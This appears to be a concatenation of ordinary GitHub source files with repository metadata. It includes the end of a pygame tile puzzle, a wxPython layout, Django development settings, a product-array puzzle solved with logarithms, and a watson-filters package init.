print("X")
if a==152 and b==0 and c==0 and d==152:
a=0
b=152
c=152
d=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([152,152,302]):
print("X")
if a==0 and b==152 and g==152 and h==152:
a=152
g=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,152,302]):
print("X")
if a==152 and b==152 and g==0 and h==152:
a=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,152,302]):
print("X")
if a==0 and b==152 and e==0 and f==0:
print(8)
b=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,302,152,302]):
print("X")
if a==0 and b==0 and g==152 and h==152:
a=152
b=152
g=0
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,302,152,302]):
print("X")
if a==152 and b==152 and g==0 and h==0:
a=0
b=0
g=152
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,302,152,302]):
print("X")
if a==152 and b==152 and c==152 and d==0:
b=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,302,152,302]):
print("X")
if a==152 and b==0 and c==152 and d==152:
d=0
b=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,152,302]):
print("X")
if a==152 and b==152 and e==0 and f==152:
a=0
e=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,152,302]):
print("X")
if a==0 and b==152 and e==152 and f==152:
e=0
a=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
# ****************************************************Second************************************************************************
#T2->T1
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([150,0,150]):
print("X")
if a==0 and b==0 and c==152 and d==0:
a=152
c=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([150,0,150]):
print("X")
if a==152 and b==0 and c==0 and d==0:
a=0
c=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([150,0,150]):
print("X")
if e==0 and f==152 and c==0 and d==0:
f=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T1
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([150,0,150]):
print("X")
if e==0 and f==0 and c==0 and d==152:
d=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([150,0,150]):
print("X")
if g==152 and h==152 and c==0 and d==0:
g=0
h=0
c=152
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T1
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([150,0,150]):
print("X")
if g==0 and h==0 and c==152 and d==152:
c=0
d=0
g=152
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T3
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,152,302]):
print("X")
if c==152 and d==0 and e==0 and f==152:
c=0
d=152
e=152
f=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,152,302]):
print("X")
if c==0 and d==152 and e==152 and f==0:
c=152
d=0
e=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,152,302]):
print("X")
if c==0 and d==152 and a==0 and b==0:
d=0
b=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,152,302]):
print("X")
if c==0 and d==0 and a==0 and b==152:
b=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([152,152,302]):
print("X")
if c==0 and d==152 and g==152 and h==152:
g=0
c=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([152,152,302]):
print("X")
if c==152 and d==152 and g==0 and h==152:
c=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,302,152,302]):
print("X")
if c==152 and d==0 and g==152 and h==152:
d=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,302,152,302]):
print("X")
if c==152 and d==152 and g==152 and h==0:
d=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,302,152,302]):
print("X")
if c==152 and d==152 and a==0 and b==0:
c=0
d=0
a=152
b=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,302,152,302]):
print("X")
if a==152 and b==152 and c==0 and d==0:
a=0
b=0
c=152
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,152,302]):
print("X")
if c==152 and d==152 and e==0 and f==152:
c=0
e=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,152,302]):
print("X")
if c==0 and d==152 and e==152 and f==152:
e=0
c=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
# *******************************************************Third*****************************************************************************
#T3->T1
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([150,0,150]):
print("X")
if a==0 and b==0 and e==0 and f==152:
b=152
f=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([150,0,150]):
print("X")
if a==0 and b==152 and e==0 and f==0:
b=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([150,0,150]):
print("X")
if e==0 and f==0 and c==152 and d==0:
e=152
c=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T1
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([150,0,150]):
print("X")
if e==152 and f==0 and c==0 and d==0:
e=0
c=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([150,0,150]):
print("X")
if g==152 and h==152 and e==0 and f==0:
g=0
h=0
e=152
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T1
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([150,0,150]):
print("X")
if e==152 and f==152 and g==0 and h==0:
e=0
f=0
g=152
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,150]):
print("X")
if c==152 and d==0 and e==0 and f==152:
c=0
d=152
e=152
f=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,150]):
print("X")
if c==0 and d==152 and e==152 and f==0:
c=152
d=0
e=0
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T1
if len(L)==2 and L[1]==([152,0,150]) and L[0]==([152,302,150]):
print("X")
if a==0 and b==0 and e==152 and f==0:
a=152
e=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T2
if len(L)==2 and L[0]==([152,0,150]) and L[1]==([152,302,150]):
print("X")
if a==152 and b==0 and e==0 and f==0:
a=0
e=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([152,302,150]):
print("X")
if e==152 and f==0 and g==152 and h==152:
f=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([152,302,150]):
print("X")
if e==152 and f==152 and g==152 and h==0:
f=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,152,302]):
print("X")
if e==0 and f==152 and g==152 and h==152:
e=152
g=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,152,302]):
print("X")
if e==152 and f==152 and g==0 and h==152:
e=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,302,152,302]):
print("X")
if e==152 and f==152 and a==0 and b==0:
e=0
f=0
a=152
b=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,302,152,302]):
print("X")
if a==152 and b==152 and e==0 and f==0:
a=0
b=0
e=152
f=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([152,302,152,302]):
print("X")
if e==152 and f==152 and c==152 and d==0:
f=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,302,152,302]):
print("X")
if e==152 and f==0 and c==152 and d==152:
f=152
d=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
# **************************************************************Fourth************************************************************************
#T4->T1
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([150,0,150]):
print("X")
if a==0 and b==0 and g==152 and h==152:
a=152
b=152
g=0
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([150,0,150]):
print("X")
if a==152 and b==152 and g==0 and h==0:
a=0
b=0
g=152
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T2
if len(L)==2 and L[1]==([152,302,150]) and L[0]==([150,0,150]):
print("X")
if c==152 and d==0 and g==0 and h==0:
c=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T1
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([150,0,150]):
print("X")
if c==0 and d==0 and g==152 and h==0:
c=152
g=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([150,0,150]):
print("X")
if e==0 and f==152 and g==0 and h==0:
f=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T1
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([150,0,150]):
print("X")
if e==0 and f==0 and g==0 and h==152:
f=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T2
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([152,302,150]):
print("X")
if c==152 and d==0 and g==152 and h==152:
h=0
d=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T4
if len(L)==2 and L[1]==([152,302,152,302]) and L[0]==([152,302,150]):
print("X")
if c==152 and d==152 and g==152 and h==0:
d=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T1
if len(L)==2 and L[1]==([150,0,150]) and L[0]==([152,302,150]):
print("X")
if a==0 and b==0 and g==152 and h==0:
g=0
a=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T2
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([152,302,150]):
print("X")
if a==152 and b==0 and g==0 and h==0:
a=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,150]):
print("X")
if e==0 and f==152 and g==152 and h==0:
e=152
f=0
g=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,150]):
print("X")
if e==152 and f==0 and g==0 and h==152:
e=0
f=152
g=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T4->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,152,302]):
print("X")
if e==0 and f==152 and g==152 and h==152:
e=152
g=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T4
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,152,302]):
print("X")
if e==152 and f==152 and g==0 and h==152:
e=0
g=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T1
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([150,0,150]):
print("X")
if a==0 and b==0 and g==0 and h==152:
h=0
b=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T1->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([150,0,150]):
print("X")
if a==0 and b==152 and g==0 and h==0:
b=0
h=152
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T3->T2
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,302,150]):
print("X")
if c==152 and d==0 and g==0 and h==152:
c=0
d=152
g=152
h=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
#T2->T3
if len(L)==2 and L[1]==([152,152,302]) and L[0]==([152,302,150]):
print("X")
if c==0 and d==152 and g==152 and h==0:
g=0
h=152
c=152
d=0
L.remove(L[0])
L.remove(L[0])
m.append(1)
# **********************************************************************************************************************************************
#T1->T1
if len(L)==2 and L[0]==([150,0,150]) and L[1]==([150,0,150]):
L.remove(L[0])
#T2->T2
if len(L)==2 and L[0]==([152,302,150]) and L[1]==([152,302,150]):
L.remove(L[0])
#T3->T3
if len(L)==2 and L[0]==([152,152,302]) and L[1]==([152,152,302]):
L.remove(L[0])
#T4->T4
if len(L)==2 and L[0]==([152,302,152,302]) and L[1]==([152,302,152,302]):
L.remove(L[0])
if len(m)==2 and g==0 and h==0 and e==152 and f==0 and c==0 and d==152 and a==152 and b==152:
print("")
if event.type==p.QUIT:
done=True
if 2<=len(m)<=5:
r=Tk()
r.title("Score")
label=Label(r,text="Your Score is 100")
label.grid(row=0,columnspan=8)
r.mainloop
Win(X)
if 6<=len(m)<=10:
r=Tk()
r.title("Score")
label=Label(r,text="Your Score is 50")
label.grid(row=0,columnspan=8)
r.mainloop
Win(X)
if 11<=len(m)<=15:
r=Tk()
r.title("Score")
label=Label(r,text="Your Score is 20")
label.grid(row=0,columnspan=8)
r.mainloop
Win(X)
if len(m)>15:
Lose(X)
p.display.update()
p.quit()
|
[
"noreply@github.com"
] |
Ameema-Arif.noreply@github.com
|
7c4dd661b10e6f4a17ea31043784a8eb8c483fd2
|
28658c31d79c99f0e0b02231b4d33eef30e8794c
|
/layout2.py
|
136f80909c0ba18ab427b18a51f46ffe31a4b9df
|
[] |
no_license
|
gamesun/learn-wxpython
|
8202b1927b6acd3da9efb5317a1a4b688d92ffda
|
0b571e117f4f0b36e388923c59e83fb625a07306
|
refs/heads/master
| 2021-01-18T19:29:20.053939
| 2014-04-19T03:37:31
| 2014-04-19T03:37:31
| 10,583,441
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,079
|
py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# generated by wxGlade 0.6.7 (standalone edition) on Thu Jun 20 20:41:34 2013
#
import wx
# begin wxGlade: dependencies
import gettext
# end wxGlade
# begin wxGlade: extracode
# end wxGlade
class myFrame(wx.Frame):
    """Main window: a scrolled panel holding a vertical splitter whose left
    pane stacks 32 StaticText rows ("label1" .. "label32")."""

    # Number of stacked label rows in the left splitter pane.
    NUM_LABELS = 32

    def __init__(self, *args, **kwds):
        kwds["style"] = wx.DEFAULT_FRAME_STYLE
        wx.Frame.__init__(self, *args, **kwds)
        self.mainframe_statusbar = self.CreateStatusBar(1, wx.ST_SIZEGRIP)
        self.pnlmain = wx.ScrolledWindow(self, wx.ID_ANY, style=wx.TAB_TRAVERSAL)
        self.window_1 = wx.SplitterWindow(self.pnlmain, wx.ID_ANY, style=wx.SP_3DBORDER | wx.SP_BORDER)
        self.window_1_pane_1 = wx.ScrolledWindow(self.window_1, wx.ID_ANY, style=wx.STATIC_BORDER | wx.TAB_TRAVERSAL)
        # Create self.label1 .. self.label32.  The generated code spelled each
        # line out by hand and mislabelled label23 with the text "label24";
        # building them in a loop fixes that copy-paste typo.
        # (Dynamic _() argument is fine at runtime; string-extraction tools
        # will not see these ids.)
        for i in range(1, self.NUM_LABELS + 1):
            name = "label%d" % i
            setattr(self, name, wx.StaticText(self.window_1_pane_1, wx.ID_ANY, _(name)))
        self.window_1_pane_2 = wx.ScrolledWindow(self.window_1, wx.ID_ANY, style=wx.STATIC_BORDER | wx.TAB_TRAVERSAL)
        self.__set_properties()
        self.__do_layout()

    def __set_properties(self):
        """Apply title, status-bar text, scroll rates and minimum size."""
        self.SetTitle(_("Tool"))
        self.mainframe_statusbar.SetStatusWidths([-1])
        # statusbar fields
        mainframe_statusbar_fields = [_("mainframe_statusbar")]
        for i, field_text in enumerate(mainframe_statusbar_fields):
            self.mainframe_statusbar.SetStatusText(field_text, i)
        self.window_1_pane_1.SetScrollRate(1, 14)
        self.window_1_pane_2.SetScrollRate(1, 1)
        self.pnlmain.SetMinSize((850, 520))
        self.pnlmain.SetScrollRate(1, 1)

    def __do_layout(self):
        """Stack the labels vertically in the left pane and wire up the
        splitter / panel / sizer hierarchy."""
        sizer1 = wx.BoxSizer(wx.HORIZONTAL)
        sizer_1 = wx.BoxSizer(wx.HORIZONTAL)
        sizertitle = wx.BoxSizer(wx.VERTICAL)
        for i in range(1, self.NUM_LABELS + 1):
            sizertitle.Add(getattr(self, "label%d" % i), 100, wx.EXPAND, 0)
        self.window_1_pane_1.SetSizer(sizertitle)
        # 80 px initial sash position for the label pane.
        self.window_1.SplitVertically(self.window_1_pane_1, self.window_1_pane_2, 80)
        sizer_1.Add(self.window_1, 1, wx.EXPAND, 0)
        self.pnlmain.SetSizer(sizer_1)
        sizer1.Add(self.pnlmain, 1, wx.EXPAND, 0)
        self.SetSizer(sizer1)
        sizer1.Fit(self)
        self.Layout()
        self.Centre()
# end of class myFrame
class MyApp(wx.App):
    """Application bootstrap: build the main frame and show it."""

    def OnInit(self):
        wx.InitAllImageHandlers()
        frame = myFrame(None, wx.ID_ANY, "")
        self.SetTopWindow(frame)
        frame.Show()
        return 1
# end of class MyApp
if __name__ == "__main__":
    # gettext.install puts _() into builtins so the GUI classes above can
    # mark translatable strings; "app" is the translation domain name.
    gettext.install("app") # replace with the appropriate catalog name
    app = MyApp(0)
    app.MainLoop()
|
[
"gamesunyt@gmail.com"
] |
gamesunyt@gmail.com
|
5be0d964b412b379fa23c40b1fa4dea76522cac5
|
a316314363af3de6063b37dc793505124474eb64
|
/mysite/settings.py
|
6d66323962cce74f9e7e32bdc3a31738204bd5b2
|
[] |
no_license
|
arya626/Change-Detection-with-Siamese-CNN
|
2cb920aef46286ce98ff5251ad03ed3e513f07fb
|
3f75180047fb4eb75a9ad7bd21943ac7094c08c8
|
refs/heads/master
| 2022-11-20T19:06:27.087445
| 2020-06-06T13:00:32
| 2020-06-06T13:00:32
| 280,451,519
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,449
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '1#3e0g5ffn$z(30rf*l73&5k5#$tf=n0!+_oif*z!br)k^p$%+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'changedetection.apps.ChangedetectionConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'crispy_forms',
'pagedown',
'imagekit',
]
CRISPY_TEMPLATE_PACK = "bootstrap4"
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR,'template')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
'/mysite/static/'
]
STATIC_ROOT = "mysite/static/"
MEDIA_ROOT = os.path.join(BASE_DIR,'media')
MEDIA_URL = '/media/'
|
[
"bharathi.purple@gmail.com"
] |
bharathi.purple@gmail.com
|
6111fd1f730be1ccf96eeecee0d08b28d83d03d1
|
77bda097e678ffd54fa8d2989854ae2c763d7d45
|
/weather/settings.py
|
c50da972575ebf1b29aca283a610cfecb533a4a5
|
[] |
no_license
|
brendanm9t/weather-app-django
|
dd6d33967a497ba7e93c150aeee7713d0e7624ba
|
92afbde2c9dfe41cd1f3451bfaf1c8c296c07a2d
|
refs/heads/master
| 2022-09-27T00:03:18.987684
| 2020-06-02T20:15:16
| 2020-06-02T20:15:16
| 268,760,833
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,133
|
py
|
"""
Django settings for weather project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '__u%kikxc5g6pz_(1qt$ryf4d1dsulswm^!09mxq4q-1_-1o!='
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'lookup', # App to search for weather
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'weather.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'weather.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"brendanmitton@gmail.com"
] |
brendanmitton@gmail.com
|
b5604de8e95d981772a8a08167d2fd6c8e1c49a3
|
9c3b9bacc2620bf317474391d296a97b245afad8
|
/daily coding problem/Uber/A Product Array Puzzle O(n) O(1).py
|
d29b4c114b723cb0eabfafe4cd443b4098869898
|
[] |
no_license
|
rishavghosh605/Competitive-Coding
|
72dd4f7f6aef45e06ac85d35fa1c79bf0d7701e2
|
0e94036004efe5d9e8a95909f22f3406f86da4e9
|
refs/heads/master
| 2020-05-30T15:32:41.628390
| 2020-04-06T15:40:04
| 2020-04-06T15:40:04
| 189,821,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 828
|
py
|
# Python program for product array puzzle
# with O(n) time and O(1) space.
'''Use property of log to multiply large numbers
x = a * b * c * d
log(x) = log(a * b * c * d)
log(x) = log(a) + log(b) + log(c) + log(d)
x = antilog(log(a) + log(b) + log(c) + log(d))'''
import math
# epsilon value to maintain precision
EPS = 1e-9
def productPuzzle(a, n):
    """Print and return the product array of `a`: element i is the product
    of all a[j] with j != i.

    Works via log10 sums so intermediates never overflow:
        prod(a) / a[i] == antilog(sum(log a) - log a[i])
    O(n) time, O(1) extra space.  All elements must be positive (log10 of
    zero or negative values is undefined).
    """
    # epsilon guards against the float antilog landing just below the true
    # integer before truncation.
    eps = 1e-9
    # log of the product of every element (renamed from `sum`, which
    # shadowed the builtin).
    log_sum = 0.0
    for i in range(n):
        log_sum += math.log10(a[i])
    result = [int(eps + 10.0 ** (log_sum - math.log10(a[i]))) for i in range(n)]
    # Expression-form print is valid under both Python 2 and 3; the original
    # `print x,` statement is a syntax error under Python 3.
    print(" ".join(str(v) for v in result))
    return result
# Driver code
a = [10, 3, 5, 6, 2]
n = len(a)
# Expression-form print is valid under both Python 2 and 3; the original
# `print "..."` statement fails to parse under Python 3.
print("The product array is: ")
productPuzzle(a, n)
'''
Output:
The product array is:
180 600 360 300 900
Time complexity : O(n)
Space complexity: O(1)
'''
|
[
"rishavghosh605@gmail.com"
] |
rishavghosh605@gmail.com
|
9f707ef234d32d134b9d40544fee0180dce546df
|
2ba1517b2537b499f548425f034548c089d49b26
|
/watson/filters/__init__.py
|
a729d5e8cd34ff755ebeda84f6373a5cb7fd5aef
|
[
"BSD-2-Clause"
] |
permissive
|
watsonpy/watson-filters
|
fa1ab2fe1ba8544bf6af56f828100d61b3bc93eb
|
22e3473d4caa3a5b208eeecd6d810f58f2d3a834
|
refs/heads/master
| 2020-12-22T23:24:04.731258
| 2019-10-03T04:28:39
| 2019-10-03T04:28:39
| 16,093,769
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 462
|
py
|
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
try:
# Fix for setup.py version import
from watson.filters.string import (Trim, Upper, Lower, RegEx, Numbers,
StripTags, HtmlEntities, Date)
__all__ = [
'Trim',
'Upper',
'Lower',
'RegEx',
'Numbers',
'StripTags',
'HtmlEntities',
'Date']
except: # noqa, pragma: no cover
pass # pragma: no cover
|
[
"simon.coulton@gmail.com"
] |
simon.coulton@gmail.com
|
e3cefd33af2af14d595f20c65c947b154e491548
|
7d0868ffa683803b55dd525beaad0ecc1ae40dcc
|
/backend/todo/views.py
|
a8c90ab361f4674b961af09b1ba9bcecb97e9be3
|
[] |
no_license
|
chelsejw/todo
|
7427ab4d212d9167aacbf32794350a82c5613f9a
|
b856aa2fe3654c6ba879b0d4d80c2a7dac655548
|
refs/heads/master
| 2023-01-18T16:10:33.169181
| 2020-12-04T09:02:56
| 2020-12-04T09:02:56
| 299,287,749
| 0
| 0
| null | 2020-10-01T13:35:47
| 2020-09-28T11:32:30
|
JavaScript
|
UTF-8
|
